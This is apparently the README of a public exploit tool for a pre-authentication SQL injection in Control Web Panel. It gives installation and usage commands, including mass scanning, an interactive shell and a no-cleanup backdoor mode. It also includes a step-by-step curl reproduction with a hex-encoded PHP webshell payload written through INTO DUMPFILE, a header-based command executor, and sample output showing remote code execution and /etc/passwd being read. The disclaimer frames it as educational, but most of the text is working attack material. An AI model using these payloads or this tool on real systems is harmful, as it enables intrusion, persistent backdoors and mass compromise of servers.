Share
## https://sploitus.com/exploit?id=AB794952-8E2E-55F8-97FF-1DE1AB6E3835
Control Web Panel ≤ 0.9.8.1224 โ Blind SQL Injection to Remote Code Execution
Port 2083 โ userRes POST โ INTO DUMPFILE โ Port 2031 Webshell โ cwpsvc
---
## ๐ด Vulnerability Overview
**CVE-2026-57517** is a critical pre-authentication blind SQL injection in **Control Web Panel (CWP)** versions โค 0.9.8.1224. The `userRes` POST parameter at the user panel endpoint is not sanitized before being embedded in an SQL query. Queries execute with **MySQL root** privileges โ which holds the global `FILE` privilege โ allowing attackers to write arbitrary files via `INTO DUMPFILE`.
The typical exploitation chain deploys a PHP webshell to the web-accessible Roundcube logs directory, achieving remote code execution as the `cwpsvc` service account.
| Field | Detail |
|---|---|
| **CVE** | CVE-2026-57517 |
| **CVSS** | 9.8 (Critical) โ `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | CWE-89 โ Blind SQL Injection (Pre-Auth) |
| **Affected** | Control Web Panel โค 0.9.8.1224 |
| **Fixed** | Version 0.9.8.1225 |
| **Disclosure** | July 1, 2026 |
| **Researcher** | Egidio Romano (Karma In Security) |
| **PoC** | Public โ [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
---
## ๐ฆ Installation
```bash
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
```
---
## ๐ Usage
```bash
# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100
# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc
# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt
# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc
# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
```
```
-t, --target Single target host
-f, --file File with targets (one per line)
-u, --username CWP username (skips auto-detection)
-o, --output Live TXT output file
--json JSON report file
--threads Concurrent workers (default: 20)
--timeout Request timeout seconds (default: 15)
--no-cleanup Leave shells on target
--rce Interactive shell mode
-v, --verbose Verbose output
```
---
## ๐งช Proof of Concept
### Scenario 1: Mass Scan
```bash
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
```
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CVE-2026-57517 | 5 targets | 20 threads
Cleanup: yes
Live TXT: live.txt
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
192.168.10.100:2083 [rce_confirmed] 18.2s
User : admin
Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
RCE : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp-prod-01.example.com
whoami: cwpsvc
โ ๏ธ 192.168.10.200:2083 [sqli_failed] 12.1s
User : cwpsvc
Error : SQL injection failed โ target may be patched or path not writable
ยท 192.168.10.50:2083 [not_cwp] 2.3s
==================================================
SCAN SUMMARY
==================================================
Total : 5
โ
RCE : 2
โ ๏ธ SQLi Fail : 1
๐ No User : 1
ยท Not CWP : 1
==================================================
```
### Scenario 2: Interactive Shell
```bash
$ python cve_2026_57517.py -t target.com --rce -u admin
```
```
CWP Interactive Shell โ target.com
Type 'exit' to quit, 'cleanup' to remove shell
cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp$ hostname
cwp-prod-01
cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash
cwp$ exit
```
### Scenario 3: Manual Reproduction (curl)
**Step 1 โ Verify CWP is reachable on port 2083**
```bash
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'
```
**Step 2 โ Validate username**
```bash
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists
```
**Step 3 โ SQL injection via userRes**
The payload uses a 13-column UNION SELECT with a hex-encoded PHP shell written via `INTO DUMPFILE`:
```sql
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
```
```bash
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'
curl -sk 'https://target.com:2083/admin/' \
-d "userRes=$PAYLOAD"
```
**Step 4 โ Execute commands via webshell (port 2031)**
The deployed PHP shell reads commands from the `C:` HTTP header:
```php
```
```bash
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)
curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)
```
### Payload Breakdown
| Component | Value |
|---|---|
| **SQL columns** | 13-column UNION SELECT |
| **PHP shell** | `` |
| **Hex encoding** | MySQL `0x...` hex literal |
| **Write method** | `INTO DUMPFILE` (binary-exact file write) |
| **Target path** | `/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php` |
| **Command delivery** | HTTP header `C:` with base64-encoded PHP |
| **Command executor** | `passthru(base64_decode('{cmd}'))` |
---
## โ ๏ธ Disclaimer
> ### ๐จ FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - ๐ก๏ธ **Security professionals** conducting authorized penetration tests
> - ๐ข **Organizations** auditing their own CWP infrastructure
> - ๐ฌ **Researchers** studying vulnerability exploitation techniques
> - ๐ **Students** learning about web application security
>
> ### โ You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### โ๏ธ Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
> - **Indonesia:** UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**
---
## ๐ References
| Resource | Link |
|---|---|
| Karma In Security Advisory | [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
| Original PoC | [CVE-2026-57517.php](https://karmainsecurity.com/pocs/CVE-2026-57517.php) |
| Full Disclosure | [SecLists](https://seclists.org/fulldisclosure/2026/Jul/9) |
| OpenCVE | [CVE-2026-57517](https://app.opencve.io/cve/CVE-2026-57517) |
| CWP Changelog | [control-webpanel.com](https://control-webpanel.com/changelog) |
---
โก Built for security research & education โก
This project is not affiliated with Control Web Panel or the Apache Software Foundation.